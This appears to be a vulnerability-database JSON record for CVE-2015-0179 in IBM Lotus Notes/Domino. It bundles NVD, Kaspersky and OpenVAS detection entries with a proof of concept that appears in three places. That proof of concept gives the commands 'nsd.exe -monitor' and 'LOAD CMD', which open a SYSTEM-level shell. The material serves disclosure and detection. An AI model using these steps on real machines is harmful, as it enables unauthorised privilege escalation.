{"id": "EDB-ID:42605", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation", "description": "Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation. CVE-2015-0179. Local exploit for Windows platform", "published": "2017-09-02T00:00:00", "modified": "2017-09-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/42605/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2015-0179"], "lastseen": "2017-09-04T13:52:57", "viewCount": 87, "enchantments": {"score": {"value": 4.4, "vector": "NONE", "modified": "2017-09-04T13:52:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-0179"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143990"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8DF3A0838C3DD4DFDF5DA51D4F92DD51"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805549"]}, {"type": "kaspersky", "idList": ["KLA10533"]}], "modified": "2017-09-04T13:52:57", "rev": 2}, "vulnersScore": 4.4}, "sourceHref": "https://www.exploit-db.com/download/42605/", "sourceData": "# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privelege Escalation\r\n# Date: 02-09-2017\r\n# Exploit Author: ParagonSec\r\n# Website: https://github.com/paragonsec\r\n# Version: 8.5 & 9.0\r\n# Tested on: Windows 7 Enterprise\r\n# CVE: CVE-2015-0179\r\n# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029\r\n# Category: Local & Privilege Escalation Exploit\r\n\r\n\r\n1. Description\r\n\r\nLotus Notes Diagnostic Tool (nsd.exe) runs under NT Authority/System rights. \r\nThis can be leveraged to run a program under the System context and elevate \r\nlocal privileges.\r\n\r\n\r\n2. Proof of Concept\r\n\r\nFirst you need to execute nsd.exe under the monitor/CLI mode:\r\n\r\n> nsd.exe -monitor\r\n\r\nNext, after NSD finishes loading you can execute any program under the System context. In this example we will execute CMD.\r\n\r\nnsd> LOAD CMD\r\n\r\nYou will see that cmd is opened as System now.\r\n\r\nAlso, NSD can be used to attach, kill processes or create memory dumps under the System context.\r\n\r\n\r\n3. Solution:\r\n\r\nThis has been fixed on release 9.0.1 FP3 and 8.5.3 FP6.\r\n", "osvdbidlist": []}

{"cve": [{"lastseen": "2021-02-02T06:21:19", "description": "Notes System Diagnostic (NSD) in IBM Domino 8.5.x before 8.5.3 FP6 IF6 and 9.x before 9.0.1 FP3 IF1 allows local users to obtain the System privilege via unspecified vectors, aka SPR TCHL9SST8V.", "edition": 5, "cvss3": {}, "published": "2015-04-06T00:59:00", "title": "CVE-2015-0179", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0179"], "modified": "2019-10-16T12:40:00", "cpe": ["cpe:/a:ibm:domino:8.5.3", "cpe:/a:ibm:domino:8.5.1", "cpe:/a:ibm:domino:9.0.1", "cpe:/a:ibm:domino:8.5.0", "cpe:/a:ibm:domino:8.5.2"], "id": "CVE-2015-0179", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0179", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ibm:domino:9.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:domino:8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:domino:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:domino:8.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:domino:8.5.3:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2017-09-05T07:24:25", "description": "", "published": "2017-09-02T00:00:00", "type": "packetstorm", "title": "Lotus Notes Diagnostic Tool 8.5 / 9.0 Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0179"], "modified": "2017-09-02T00:00:00", "id": "PACKETSTORM:143990", "href": "https://packetstormsecurity.com/files/143990/Lotus-Notes-Diagnostic-Tool-8.5-9.0-Privilege-Escalation.html", "sourceData": "`# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privelege Escalation \n# Date: 02-09-2017 \n# Exploit Author: ParagonSec \n# Website: https://github.com/paragonsec \n# Version: 8.5 & 9.0 \n# Tested on: Windows 7 Enterprise \n# CVE: CVE-2015-0179 \n# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029 \n# Category: Local & Privilege Escalation Exploit \n \n \n1. Description \n \nLotus Notes Diagnostic Tool (nsd.exe) runs under NT Authority/System rights. \nThis can be leveraged to run a program under the System context and elevate \nlocal privileges. \n \n \n2. Proof of Concept \n \nFirst you need to execute nsd.exe under the monitor/CLI mode: \n \n> nsd.exe -monitor \n \nNext, after NSD finishes loading you can execute any program under the System context. In this example we will execute CMD. \n \nnsd> LOAD CMD \n \nYou will see that cmd is opened as System now. \n \nAlso, NSD can be used to attach, kill processes or create memory dumps under the System context. \n \n \n3. Solution: \n \nThis has been fixed on release 9.0.1 FP3 and 8.5.3 FP6. \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143990/lotusnotesdiag-escalate.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:29", "description": "\nLotus Notes Diagnostic Tool 8.59.0 - Local Privilege Escalation", "edition": 1, "published": "2017-09-02T00:00:00", "title": "Lotus Notes Diagnostic Tool 8.59.0 - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0179"], "modified": "2017-09-02T00:00:00", "id": "EXPLOITPACK:8DF3A0838C3DD4DFDF5DA51D4F92DD51", "href": "", "sourceData": "# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privelege Escalation\n# Date: 02-09-2017\n# Exploit Author: ParagonSec\n# Website: https://github.com/paragonsec\n# Version: 8.5 & 9.0\n# Tested on: Windows 7 Enterprise\n# CVE: CVE-2015-0179\n# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029\n# Category: Local & Privilege Escalation Exploit\n\n\n1. Description\n\nLotus Notes Diagnostic Tool (nsd.exe) runs under NT Authority/System rights. \nThis can be leveraged to run a program under the System context and elevate \nlocal privileges.\n\n\n2. Proof of Concept\n\nFirst you need to execute nsd.exe under the monitor/CLI mode:\n\n> nsd.exe -monitor\n\nNext, after NSD finishes loading you can execute any program under the System context. In this example we will execute CMD.\n\nnsd> LOAD CMD\n\nYou will see that cmd is opened as System now.\n\nAlso, NSD can be used to attach, kill processes or create memory dumps under the System context.\n\n\n3. Solution:\n\nThis has been fixed on release 9.0.1 FP3 and 8.5.3 FP6.", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0117", "CVE-2015-0179"], "description": "This host is installed with IBM Domino and\n is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-05-08T00:00:00", "id": "OPENVAS:1361412562310805549", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805549", "type": "openvas", "title": "IBM Domino Multiple Vulnerabilities - May15", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_domino_mult_vuln_may15.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# IBM Domino Multiple Vulnerabilities - May15\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ibm:lotus_domino\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805549\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-0117\", \"CVE-2015-0179\");\n script_bugtraq_id(73911, 73913);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-08 16:03:56 +0530 (Fri, 08 May 2015)\");\n script_name(\"IBM Domino Multiple Vulnerabilities - May15\");\n\n script_tag(name:\"summary\", value:\"This host is installed with IBM Domino and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An overflow condition that is triggered as user-supplied input is not properly\n validated when handling a LDAP ModifyRequest packet.\n\n - An unspecified flaw in Notes System Diagnostic(NSD) that may allow a local\n attacker to gain elevated privileges.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to gain elevated privileges and to cause a stack-based buffer overflow,\n resulting in a denial of service or potentially allowing the execution of\n arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"IBM Domino 8.5.x before 8.5.3 FP6 IF6\n and 9.x before 9.0.1 FP3 IF1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to IBM Domino 8.5.3 FP6 IF6 or\n 9.0.1 FP3 IF1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21700029\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_lotus_domino_detect.nasl\");\n script_mandatory_keys(\"Domino/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\"); # Used in get_highest_app_version\ninclude(\"host_details.inc\");\n\nif(!domVer = get_highest_app_version(cpe:CPE)){\n exit(0);\n}\n\ndomVer1 = ereg_replace(pattern:\"FP\", string:domVer, replace: \".\");\n\nif(version_in_range(version:domVer1, test_version:\"8.5\", test_version2:\"8.5.3.6\"))\n{\n fix = \"8.5.3 FP6 IF6\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:domVer1, test_version:\"9.0\", test_version2:\"9.0.1.3\"))\n{\n fix = \"9.0.1 FP3 IF1\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed Version: ' + domVer + '\\nFixed Version: ' + fix + '\\n';\n security_message(data:report, port:0);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:45:13", "bulletinFamily": "info", "cvelist": ["CVE-2015-0134", "CVE-2015-0117", "CVE-2015-0179"], "description": "### *Detect date*:\n04/05/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in IBM Domino. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code or gain privileges.\n\n### *Affected products*:\nIBM Domino 8.5 versions earlier than 8.5.3 FP6 IF6 \nIBM Domino 9 versions earlier than 9.0.1 FP3 IF1\n\n### *Solution*:\nFollow vendor instructions for your versions\n\n### *Original advisories*:\n[IBM advisories](<http://www-01.ibm.com/support/docview.wss?uid=swg21700029>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[IBM Domino](<https://threats.kaspersky.com/en/product/IBM-Domino/>)\n\n### *CVE-IDS*:\n[CVE-2015-0134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0134>)10.0Critical \n[CVE-2015-0179](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0179>)7.2High \n[CVE-2015-0117](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0117>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2015-04-05T00:00:00", "id": "KLA10533", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10533", "title": "\r KLA10533Multiple vulnerabilities in IBM domino ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}